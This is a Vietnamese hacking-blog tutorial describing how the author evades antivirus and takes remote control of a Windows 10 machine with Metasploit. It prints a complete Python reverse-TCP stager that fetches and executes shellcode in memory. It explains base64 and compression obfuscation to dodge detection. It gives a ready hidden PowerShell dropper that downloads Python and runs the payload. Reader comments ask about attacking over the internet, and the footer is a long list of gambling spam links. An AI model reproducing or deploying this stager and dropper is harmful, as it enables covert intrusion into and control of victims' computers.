• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Mình đã Bypass AV xâm nhập Windows 10 với Metasploit và Python như thế nào ?

Hevin by Hevin
in Basic Hacking
A A
6

Mục lục bài viết

  1. Khái niệm sơ qua về Metasploit
  2. Meterpreter Reverse TCP trong Metasploit là gì ?
  3. Tạo payload Meterpreter Reverse TCP trong Metasploit với Python
  4. Tấn công Windows 10 với Metasploit và Python

An ninh mạng đóng vai trò quan trọng trong thế giới công nghệ ngày nay. Việc kiểm tra và nâng cao độ bảo mật hệ thống là trách nhiệm của người quản trị hệ thống và chuyên gia an ninh. Tuy nhiên, việc vượt qua phần mềm chống virus ( Bypass AntiVirus ) đã trở thành một phần không thể thiếu trong quá trình kiểm tra và đánh giá an ninh. Trong bài viết này, mình sẽ chia sẻ với bạn về kinh nghiệm thành công của mình trong việc Bypass AV và xâm nhập vào một máy tính chạy hệ điều hành Windows 10 bằng cách sử dụng Metasploit và Python. Đây là một quá trình thử thách và mang lại sự hiểu biết sâu hơn về phần mềm chống vi-rút và phát hiện các lỗ hổng trong hệ thống. Sau vài ngày mình tìm tòi về payload windows/meterpreter/reverse_tcp của Metasploit. mình đã viết ra 1 đoạn Script Python nhỏ cho payload này và cuối cùng thực hiện việc xâm nhập vào máy tính mục tiêu với đoạn script đó. Hãy cùng mình khám phá và tìm hiểu quá trình bypass AV và xâm nhập vào Windows 10 bằng cách sử dụng Metasploit và Python trong bài viết này nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Lưu ý: Bài viết không khuyến khích việc sử dụng kỹ thuật này cho bất kỳ hoạt động bất hợp pháp hoặc gây hại cho người khác. Anonyviet hy vọng rằng thông qua việc chia sẻ kiến thức này, bạn có thể nâng cao hiểu biết về an ninh mạng và áp dụng các biện pháp bảo vệ để bảo vệ hệ thống của mình. Mọi hành vi bất hợp pháp Anonyviet sẽ không chịu mọi trách nhiệm !

Các bài viết liên quan

Cách Hacker Bypass AV xâm nhập Windows với Autoit

Cách Hacker Bypass AV xâm nhập Windows với Autoit

09/01/2024
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 3

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023
Cách tạo trình quét Virus đơn giản bằng API của Virus Total 4

Cách tạo trình quét Virus đơn giản bằng API của Virus Total

25/05/2023

Khái niệm sơ qua về Metasploit

Metasploit là một framework mã nguồn mở rất phổ biến trong lĩnh vực kiểm thử xâm nhập và khai thác lỗ hổng. Nó được sử dụng để tạo ra một môi trường điều kiện nhân tạo để phân tích các lỗ hổng bảo mật, giúp các chuyên gia bảo mật tìm ra các điểm yếu trong hệ thống mạng và ứng dụng của họ. Metasploit cung cấp rất nhiều công cụ và tài nguyên để tấn công và khai thác các lỗ hổng trong hệ thống, giúp chuyên gia bảo mật kiểm tra và tăng cường tính bảo mật của mạng và ứng dụng. Metasploit được phát triển bởi Rapid7 và sử dụng ngôn ngữ lập trình Ruby, với giao diện dòng lệnh và đồ họa để người dùng dễ dàng sử dụng. Nó cho phép người dùng tự động hóa quá trình kiểm thử và tìm ra các lỗ hổng, tăng cường hiệu suất và tiết kiệm thời gian. Metasploit cung cấp nhiều tính năng như scan port, tìm kiếm lỗ hổng, khai thác, tràn bộ đệm, thu thập thông tin, tạo mã độc,…. Nó cũng cung cấp một cơ sở dữ liệu lỗ hổng rộng lớn, cho phép người dùng tìm kiếm và khai thác các lỗ hổng đã được biết đến. Không những thế nó còn là một công cụ được sử dụng để kiểm tra và củng cố tính bảo mật của hệ thống từ đó cung cấp một môi trường an toàn hơn cho các hệ thống mạng và ứng dụng

Meterpreter Reverse TCP trong Metasploit là gì ?

Meterpreter Reverse TCP là một loại kết nối ngược (reverse connection) được sử dụng trong Metasploit Framework để tạo một secure channel ( kênh truyền thông an toàn ) giữa máy tấn công và máy mục tiêu.

Khi sử dụng Meterpreter Reverse TCP, máy hacker đóng vai trò là máy chủ lắng nghe (listener), trong khi máy nạn nhân là máy khách (client). Quá trình hoạt động diễn ra như sau:

  1. Máy hacker khởi động một cổng TCP cụ thể ( listener )
  2. Máy nạn nhân lây nhiễm bởi một payload (chương trình độc hại) thông qua một phương thức tấn công, ví dụ như download phần mềm độc hại,  hoặc xâm nhập qua email,…
  3. Payload được thiết lập trên máy mục tiêu và kết nối ngược (reverse connection) được thiết lập từ máy nạn nhân đến máy hacker thông qua giao thức TCP.
  4. Khi kết nối được thiết lập, Meterpreter là một công cụ quản lý tấn công mạnh mẽ trong Metasploit, được chạy trên máy nạn nhân và giao tiếp với máy hacker thông qua secure channel đã thiết lập
Xem thêm:  9 điều tuyệt đối nên tránh khi dùng Tor

Meterpreter Reverse TCP cung cấp nhiều tính năng mạnh mẽ cho hacker, bao gồm khả năng kiểm soát từ xa máy nạn nhân, thực thi các lệnh trên hệ thống của nạn nhân, truy cập vào các tệp và thư mục, thu thập thông tin quan trọng và thậm chí thâm nhập sâu vào hệ thống

Tạo payload Meterpreter Reverse TCP trong Metasploit với Python

Chi tiết cấu trúc payload:

  • Kết nối đến máy hacker thông qua socket TCP/IP.
  • Nhận dữ liệu từ kết nối và giải nén các thông tin cần thiết.
  • Sử dụng thư viện ctypes trong Python để cấp phát bộ nhớ và sao chép mã máy thấp vào bộ nhớ.
  • Tạo một luồng riêng biệt để thực thi mã máy thấp trong bộ nhớ.
  • Dừng chương trình chính để duy trì quyền điều khiển từ xa

Đoạn code Python này bắt đầu bằng việc import các thư viện cần thiết để làm việc với socket, struct, time, threading và ctypes

import socket
import struct
import time
import threading
import ctypes

 

Biến ip định nghĩa địa chỉ IP mà máy tính đang chạy chương trình sẽ kết nối đến. Biến port chỉ định số cổng để kết nối tới hacker

ip = "<ip>" # địa chỉ ip hacker
port = <port> # số cổng hacker đã mở bên Metasploit

 

Khởi tạo biến connected để theo dõi trạng thái kết nối và sử dụng vòng lặp while để thử kết nối với máy hacker cho đến khi thành công. Trong vòng lặp while này, một socket được tạo và cố gắng kết nối đến địa chỉ IP và cổng của hacker. Nếu kết nối thành công, biến connected được đặt thành True và vòng lặp dừng lại. Nếu xảy ra lỗi TimeoutError, payload sẽ chờ 0.1 giây rồi kết nối lại

connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

 

Nhận dữ liệu đầu tiên từ socket. Dòng code bên dưới sử dụng phương thức recv() của socket để nhận 4 byte dữ liệu đầu tiên từ kết nối

data = s.recv(4)

 

Giải nén độ dài dữ liệu từ dữ liệu nhận được. Dòng code bên dưới sử dụng hàm unpack() từ module struct để giải nén 4 byte đầu tiên của dữ liệu thành một số nguyên không dấu 32 bit (unsigned integer) được đóng gói theo định dạng little-endian. Sau đó, giá trị này được cộng với 5 và gán cho biến data_len. Việc cộng 5 đến data_len là do dữ liệu sau khi giải nén bao gồm cả 4 byte đầu tiên nhưng cần phải chứa thêm 5 byte

data_len = struct.unpack("<I", data)[0] + 5

 

Tiếp tục nhận dữ liệu từ socket cho đến khi đủ độ dài đã giải nén. Vòng lặp này sử dụng phương thức recv() để nhận dữ liệu từ socket cho đến khi tổng chiều dài của dữ liệu đã nhận được bằng với data_len

while len(data) < data_len:
    data += s.recv(data_len - len(data))

 

Đóng gói handle của socket và dữ liệu đã nhận vào một bytearray mới. Với dòng code này sử dụng hàm pack() từ module struct để đóng gói số hiệu file (file descriptor) của socket (s.fileno()) thành một bytearray handle. Sau đó, các bytearray khác được tạo ra bằng cách ghép nối bytearray [0xBF]một bytearray chứa một phần tử duy nhất là giá trị 0xBF (191 trong hệ thập phân), bytearray(handle) chuyển đổi biến handle từ kiểu dữ liệu được đóng gói thành một bytearray mới.data[4:] truy cập vào phần dữ liệu đã nhận từ socket, bắt đầu từ byte thứ 4 (bỏ qua 4 byte đầu tiên). Toàn bộ các bytearray được ghép nối với nhau bằng phép cộng (+) để tạo ra bytearray data mới

handle = struct.pack("<I", s.fileno())
data = bytearray([0xBF]) + bytearray(handle) + data[4:]

 

Xem thêm:  Cách dùng Sherlock để thu thập thông tin mạng xã hội của một người

Hai hằng số MEM_COMMIT và PAGE_EXECUTE_READWRITE được định nghĩa để sử dụng trong việc cấp phát bộ nhớ và thiết lập quyền truy cập bộ nhớ. MEM_COMMIT là một hằng số được đặt giá trị là 0x1000, biểu thị chế độ cấp phát bộ nhớ trong hàm VirtualAlloc().Giá trị 0x1000 tương ứng với cấp phát vùng nhớ mới và cấu hình quyền truy cập vào vùng nhớ đó. PAGE_EXECUTE_READWRITE là một hằng số có giá trị là 0x40, biểu thị quyền truy cập vào vùng nhớ trong hàm VirtualAlloc(). Giá trị 0x40 đại diện cho quyền truy cập đọc, ghi và thực thi (execute) cho vùng nhớ đó. Bằng cách sử dụng PAGE_EXECUTE_READWRITE, mình cho phép vùng nhớ được cấp phát có thể chứa mã thực thi và có thể đọc và ghi dữ liệu

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

 

Sử dụng thư viện kernel32 từ ctypes để cấp phát và sao chép dữ liệu vào bộ nhớ. Dòng code bên dưới sử dụng hàm VirtualAlloc() của thư viện kernel32 để cấp phát một khối bộ nhớ có kích thước là len(data). Khối bộ nhớ này sẽ được cấp phát với quyền truy cập PAGE_EXECUTE_READWRITE. Sau đó, dữ liệu từ data được sao chép vào địa chỉ bộ nhớ được cấp phát bằng cách sử dụng ctypes.memmove(). Các dòng code mà mình đã đề cập có liên quan đến việc sử dụng Windows API thông qua ctypes để cấp phát và sao chép dữ liệu vào vùng nhớ được cấp phát. Cụ thể như sau:

  1. kernel32 = ctypes.windll.kernel32:
    • Dòng này tạo một đối tượng kernel32 để truy cập các hàm của Windows API trong thư viện kernel32.dll.
    • ctypes.windll là một cách để truy cập các thư viện được cung cấp bởi hệ điều hành Windows.
  2. address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    • kernel32.VirtualAlloc() là một hàm trong Windows API để cấp phát vùng nhớ ảo.
    • Dòng mã trên gọi hàm VirtualAlloc() để cấp phát một vùng nhớ ảo mới.
    • None đại diện cho địa chỉ cơ sở (base address) của vùng nhớ ảo (do không xác định trước).
    • len(data) xác định kích thước (số byte) của vùng nhớ cần cấp phát, dựa trên kích thước của data.
    • MEM_COMMIT là hằng số đã được định nghĩa trước, biểu thị chế độ cấp phát bộ nhớ.
    • PAGE_EXECUTE_READWRITE cũng là hằng số đã được định nghĩa trước, biểu thị quyền truy cập vào vùng nhớ.
  3. data_array = (ctypes.c_char * len(data)).from_buffer(data):
    • Dòng mã này tạo một mảng data_array với kiểu dữ liệu ctypes.c_char và kích thước là len(data).
    • ctypes.c_char đại diện cho một ký tự (byte) trong ctypes.
    • .from_buffer(data) tạo một view (chế độ xem) của mảng data đã được nhận trước đó, nghĩa là mảng data_array sẽ trỏ đến vùng nhớ của data để sử dụng chung dữ liệu.
  4. ctypes.memmove(address, ctypes.pointer(data_array), len(data)):
    • ctypes.memmove() là một hàm trong ctypes để sao chép dữ liệu từ một vùng nhớ đến một vùng nhớ khác.
    • Dòng mã trên sao chép nội dung của data_array vào vùng nhớ được cấp phát address.
    • address là địa chỉ cần sao chép dữ liệu đến.
    • ctypes.pointer(data_array) trả về con trỏ đến vùng nhớ của data_array.
    • len(data) xác định số byte cần sao chép

Nói chung là đoạn code bên dưới sử dụng Windows API thông qua ctypes để cấp phát một vùng nhớ ảo mới, tạo một mảng dữ liệu data_array trỏ đến dữ liệu đã nhận từ socket, và sau đó sao chép dữ liệu từ data_array vào vùng nhớ đã được cấp phát. Quá trình này chuẩn bị cho việc thực thi mã thực thi từ vùng nhớ ảo đó

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))

 

Với dòng code bên dưới, mình đã tạo một luồng mới bằng cách sử dụng module threading.Thread(). Luồng này sẽ thực thi mã máy thấp tại địa chỉ bộ nhớ được cấp phát. Địa chỉ bộ nhớ này được truyền vào target dưới dạng con trỏ hàm ctypes.CFUNCTYPE(None). Không có đối số được truyền vào luồng (args=())

thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

 

Xem thêm:  Cách nhận biết máy tính bị nhiễm virus

Dòng code cuối cùng dùng để cho payload chạy trong 9999999 giây tức là khoảng 115 ngày, bạn có thể tăng thêm hoặc giảm thời gian tùy ý nhé

time.sleep(9999999)

 

Đây là toàn bộ mã nguồn mà mình đã tạo:

import socket
import struct
import time
import threading
import ctypes

ip = "<ip>" # địa chỉ ip hacker 
port = <port> # số cổng hacker đã mở bên Metasploit
connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

data = s.recv(4)

data_len = struct.unpack("<I", data)[0] + 5
while len(data) < data_len:
    data += s.recv(data_len - len(data))

handle = struct.pack("<I", s.fileno())

data = bytearray([0xBF]) + bytearray(handle) + data[4:]

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))


thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

time.sleep(9999999)

Bây giờ chúng ta sẽ đến phần tấn công Windows 10 với Metasploit và Python nhé

Tấn công Windows 10 với Metasploit và Python

Bây giờ, máy hacker có địa chỉ ip 192.168.1.3 và port tcp 9999, tiếp đến địa chỉ ip máy nạn nhân là 192.168.1.5, mình sẽ tiến hành setup trên Metasploit như sau:

Bypass AV hack WIndows 10 với Metasploit và Python

 

Được rồi, giờ mình mã hóa script python với module marshal, zlib, lzma và base64 để tránh các phần mềm AntiVirus quét được, đoạn script python đã mã hóa có dạng như sau:

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Sau khi mã hóa script python với module marshal, zlib, lzma và base64, mình lại mã hóa toàn bộ script với base64 tại website base64encode.org

Bấm vào “ENCODE” để bắt đầu mã hóa

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Bấm vào “Copy to clipboard” để copy mã base64 lại nhé

bypass AV xâm nhập Windows 10 với Metasploit và Python

Đây là đoạn lệnh Powershell mình đã viết sẵn, việc của bạn là chỉ cần paste toàn bộ script được mã hóa bằng base64. Bạn thay thế <your base64code payload>thành mã base64 của bạn

powershell.exe -WindowStyle Hidden -Command "$code_payload='<your base64code payload>'; $bat1='@echo off'; $bat2='pythonRun module.py'; $cd_appdata=$Env:AppData; Set-Location -Path $cd_appdata; $current_cwd=Get-Location; if (Test-Path -Path 'pythonRun') { Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden } else { Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.9/python-3.10.9-embed-win32.zip' -OutFile pythonRun.zip; Expand-Archive -Path pythonRun.zip -DestinationPath pythonRun; Start-Sleep -Seconds 1; Rename-Item -Path \"$current_cwd\pythonRun\python.exe\" -NewName pythonRun.exe; Remove-Item -Path pythonRun.zip; Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden }"

 

Đây là đoạn lệnh của mình, chỉ cần thực thi đoạn lệnh Powershell là nó tự động tải Python vào máy nạn nhân và thực thi đoạn script Python độc hại đã được mã hóa bằng base64

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Và đây là kết quả

Như vậy, chưa đầy 50 dòng code Python cộng với 1 đoạn lệnh Powershell và công cụ Metasploit, mình đã có thể xâm nhập Windows 10 rồi. Mình muốn nhấn mạnh rằng việc tấn công máy tính của người khác là trái với đạo đức và pháp luật. Mình viết bài này chỉ để giúp người đọc hiểu thêm về cách thức hoạt động của các mã độc và cách phòng chống nó. Nếu bạn là một chuyên gia bảo mật, mình hy vọng rằng bài viết này sẽ giúp bạn nâng cao kiến thức và kỹ năng của mình trong việc sử dụng công cụ Metasploit để kiểm tra tính an toàn của hệ thống và bảo vệ chúng khỏi các cuộc tấn công từ phía tin tặc. Và nếu bạn là một người dùng bình thường, mình khuyên bạn luôn cập nhật các phần mềm bảo mật và hạn chế việc tải các phần mềm từ những nguồn không rõ nguồn gốc để bảo vệ tốt nhất cho hệ thống của mình.

Cuối cùng, mình muốn nhấn mạnh rằng việc sử dụng các công cụ Metasploit cũng như là các công cụ khác để xâm nhập vào hệ thống của người khác là trái với đạo đức và pháp luật. Chúng ta cần tôn trọng quyền riêng tư và bảo vệ an toàn thông tin của nhau nhé. Chúc bạn có một ngày tốt lành ! BYE BYE !!!!

 

Bạn cũng có thể đọc thêm bài viết Cách quét lỗ hổng bằng Metasploit 

Tags: avBypass avvirus
Hevin

Hevin

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 5
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 6
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 7
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 8
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 9
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024
Seekr: Thu thập & quản lý dữ liệu OSINT 10
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024
Subscribe
Notify of
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

6 Comments
oldest
newest
Inline Feedbacks
View all comments
huy hoang
huy hoang
1 year ago

Mình vẫn chưa hiểu nếu cách này thì chỉ dùng cho cùng mạng LAn đúng không chứ từ xa qua ip tĩnh và port thì máy nạn nhân nó đầu tấn công được

Reply
AnonyViet
Admin
AnonyViet
1 year ago
Reply to  huy hoang

tấn công từ xa thì bạn nat port

Reply
long
long
2 months ago
Reply to  AnonyViet

có cách nào không cần nat port không bác, forward port đc ko bác

Reply
AnonyViet
Admin
AnonyViet
2 months ago
Reply to  long

bạn xem các hướng dẫn ở đây https://anonyviet.com/?s=nat+port

Reply
Trung
Trung
1 year ago

cho mình hỏi nếu chx thêm your base64code payload vào máy thì chạy không sao đúng không? Mình lỡ chạy nhma chưa thêm cái your base64code payload của mình vào

Reply
hevin
hevin
6 months ago
Reply to  Trung

Đúng rồi bạn, chưa thêm base64 code máy chạy không sao đâu

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Lucida: Tải nhạc SoundCloud, Tidal miễn phí, không quảng cáo 13

Lucida: Tải nhạc SoundCloud, Tidal miễn phí, không quảng cáo

by Thanh Kim
13/05/2025
0

Tìm hiểu về tiêu chuẩn an toàn EN81 cho thang máy gia đình 14

Tìm hiểu về tiêu chuẩn an toàn EN81 cho thang máy gia đình

by AnonyViet
12/05/2025
0

Folder Icon Changer: Thay đổi icon thư mục Windows chưa từng dễ đến thế 15

Folder Icon Changer: Thay đổi icon thư mục Windows chưa từng dễ đến thế

by Thanh Kim
12/05/2025
0

Cách kiểm tra ChatGPT đã lưu trữ dữ liệu gì về bạn? 16

Cách kiểm tra ChatGPT đã lưu trữ dữ liệu gì về bạn?

by Thanh Kim
11/05/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • Yagami trong Share Key Kaspersky Plus 92 ngày
  • th thuy trong [Facebook] TUT Check Pass Facebook Mới
  • AnonyViet trong Cách dùng Netwave-GoAhead Exploit khai thác lỗ hổng Camera an ninh
  • chidung trong Share Key Kaspersky Plus 92 ngày
  • Long trong Share Key Driver Booster 12 PRO miễn phí
  • Long trong Cách dùng Netwave-GoAhead Exploit khai thác lỗ hổng Camera an ninh
  • Thach chuoL trong Hướng dẫn chế ảnh số dư tài khoản MB Bank
  • Thach chuoL trong Hướng dẫn chế ảnh số dư tài khoản MB Bank
  • Lâm Xung trong Cách nhận License Key Driver Booster Pro 12 6 tháng miễn phí
  • thien trong Tạo VPS 64GB RAM 16 Core miễn phí trên Google IDX
  • AnonyViet trong Lab cài đặt và cấu hình Windows Server 2016
  • linh trong Lab cài đặt và cấu hình Windows Server 2016
  • AnonyViet trong Chia sẻ tài khoản Claude.AI miễn phí – AI hay hơn ChatGPT
  • Phan trong Chia sẻ tài khoản Claude.AI miễn phí – AI hay hơn ChatGPT
  • ndhoc trong Tạo VPS 64GB RAM 16 Core miễn phí trên Google IDX
  • Galax trong Tạo VPS 64GB RAM 16 Core miễn phí trên Google IDX
  • Nam trong Chia sẻ tài khoản Claude.AI miễn phí – AI hay hơn ChatGPT
  • tuan trong TUT Thêm Email Vào Facebook Người Khác Không Bị Checkpoint
  • AnonyViet trong Tải game Nobihaza Việt hóa – Doremon phiên bản chế
  • gbao trong Tải game Nobihaza Việt hóa – Doremon phiên bản chế

©2025 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ Cộng đồng nuôi chó kết quả xổ số hôm nay https://mb66.bz/ trực tiếp bóng đá xoilac colatv truc tiep bong da trang chủ hi88 trang chủ hi88 kubet777 KUBET xoilac 8xbet https://vn88-vn.com/ https://i9bet-vn.net/ https://typhu88-vn.com/ https://hb88-vn.org/ Kubet Sun win https://bj8884.com/ https://bj8883.com/ 188BET 188Bet 8xbet bong88 https://cwfun.org/ https://hi88.gives/ 33win 789win ww88 888B kubet https://thabet-vn.com/ Ae888 kubet 789Club 188BET 188BET Link https://789club10.pro kubet hi88 188bet 8kbet pg88 99ok xin88 good88 https://www.chantalsutherlandjockey.com/ https://www.thepajamagamethemusical.com/ thabet kubet F168 w88 cakhiatv quả anh đào cuteo dưa leo truyện KUBET88 Thapcam TV https://78win.id/ Game bài đổi thưởng https://33winlink.live/ 68gamebai MB66 FB88 hi88 Hi88 8day Thabet 33win Bk8 Go88 69VN 69VN 69VN W88 https://bj8880.com/ 88clb TDTC https://78win.dental/ fun88 789win w88 nhà cái uy tín sunwin sunwin sunwin f168 xem bóng đá trực tuyến f8bet k8cc Jun88 info typhu88 RR88 rr88 https://qq883a.com/ Leo88 Leo88 Net88 nha cai uy tin mu88 casino Vebo TV https://v9betnet.com/ https://ee88vie.com/ 78win 69vn max88 manclub iwin 79king mu88 com mu 88 https://78winn.city/ ww88 SV388 HB88 69VN jun88 bk8 rikvip hitclub sunwin go88 98win 789bet m88 s666 sv388 789bet 69VN Zomclub RR88 8xbet 8kbet 8kbet 8kbet https://hi88fz.com/ fb68 https://bet88.diy/ 8day https://33win.promo/ IWIN 99ok https://bong88.la/ XO88 HDBET SAM86 QQ88 https://u888.one/ ABC8 https://go886.org/ https://sunwin10.org/ https://789club10.life/ Jun88 https://jun88pro.org/ 77Bet HB88 123b https://33winvn.me/ king88 king88 https://789bet188.com/ https://789bet188.us/ https://789bet188.today/ https://789bet188.xyz/ https://789bet188.pro/ https://789bet188.cloud/ https://789bet188.info/ https://789bet188.live/ https://789bet188.online/ https://789bet188.co/ https://789bet188.tech/ https://789bet188.biz/ https://789bet188.club/ https://789bet188.vip/ https://789bet188.site/ https://789bet.asia/ https://new8822.com/ https://new8818.org/ https://new8818.me/ https://new8818.xyz/ https://new8818.pro/ https://new8818.cloud/ https://new8818.info/ https://new8818.us/ https://new8818.live/ https://new8818.online/ https://new8818.co/ https://new8818.today/ https://new8818.biz/ https://new88820.com/ https://new8818.vip/ https://new8818.site/ https://new8818.ink/ https://ahihi88.host/ https://hi8818.com/ https://hi8818.site/ https://hi8818.ink/ https://hi8818.me/ https://hi8818.xyz/ https://hi8818.blog/ https://hi8818.us/ https://hi8818.cloud/ https://hi8818.online/ https://shbet188.org/ https://shbet188.me/ https://shbet188.pro/ https://shbet188.cloud/ https://shbet188.ink/ https://shbet288.store/ https://shbet288.today/ https://shbet288.tech/ https://shbet188.xyz/ https://shbet188.us/ https://shbet188.shop/ https://jun8818.org/ https://jun8818.net/ https://jun8818.me/ https://jun8818.xyz/ https://jun8818.pro/ https://jun8818.cloud/ https://jun8818.info/ https://jun8818.us/ https://jun8818.live/ https://jun8818.shop/ f168 BET88 U888 Hi88 uno rr88 Mibet win55 kwin https://ok9.today/ zbet Tha bet hello88 188bet kubet11 k8cc Wi88 f168 FB88 https://w88.gifts/ luckywin https://bet88.love/ Bet88 188BET 68 game bài qh88 fm88 F168 https://go886.life/ 69VN 58win https://kubet96.com/ https://xin88.international/ https://xin88.de.com/ 7mcn https://bet88.ventures/ Hitclub xo88 For88 GK88 F8BET five88 five88 SH BET https://t8kbet.com/ sumvip https://aysel.ws/ NEW88 ww88 69vn 3King 999bet Luk88 Sao789 alo789 https://vb88.social/ rr88 qh88 https://918xxy.com/ 58WIN 58WIN NOHU90 79sodo https://iriskyle.com zonedietathome.com https://b52.ink tải go88 Sunwin https://77betvn.me/ https://hb88vn.live/ kubet thailand F8bet bk8 qh88 qh88 789club tài xỉu online uy tín Gemwin Game bài đổi thưởng uy tín https://sunwinli.net/ https://sunwinme.net/ https://sunwintel.net/ FB88 https://www.newfacespac.com/ jun88 qq88 i9bet 78Win trang cá cược bóng đá E2BET Bet88 VeboTV https://58win.digital/ iWin68 nhà cái net88 23WIN kubet NH88 https://new88.market/ loto188 lixi88 FCB88 shbet Vnew88 QQ88 58WIN https://abc8gd.com/ https://f168.guide/ 8xbet 69VN vip66 xoso66 KUBET 789 BET Xoso66 Vip66 vip66 xoso66 luckywin https://shbet.asia/ https://68ww88.com/ https://nohu90ab.com/ gk88 F168 SHBET shbet kwin https://e2beting.com/ 32WIN 79king Nhà cái uy tín Vin777 HB88 SV388 PG88 PG88 KUBET ww88 https://www.hellocupcakebook.com/ SAOWIN 77BET ZOWIN WIN79 KUBET 69vn 8xbet 98win hitclub https://79kingg.me/ f168 E2BET SV388 88VV fb88 https://keonhacai.select/ b52club 8kbet 88vv WW88 789P 58win bắn cá đổi thưởng New 88 W88 OK365 luckywin GOOD88 luongsonTV Bet88 Nhà Cái WW88 sunwin soi cầu 247 design https://69vn.community/ S666 S666 NH88 W88 jun88 FB88 W88 6789 Daga bongda365 sodo66 Gemwin 45678 33win nhatvip Suncity 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 78win abc8 c54 new88 i9bet ok365 ae888 https://keonhacai.fund/ trang chủ hi88 https://bet88bb.com/ 69VN splive vebotv 6623 Pk14 K8cc Daga qq88 68WIN 8XBET https://shbet.solar/ 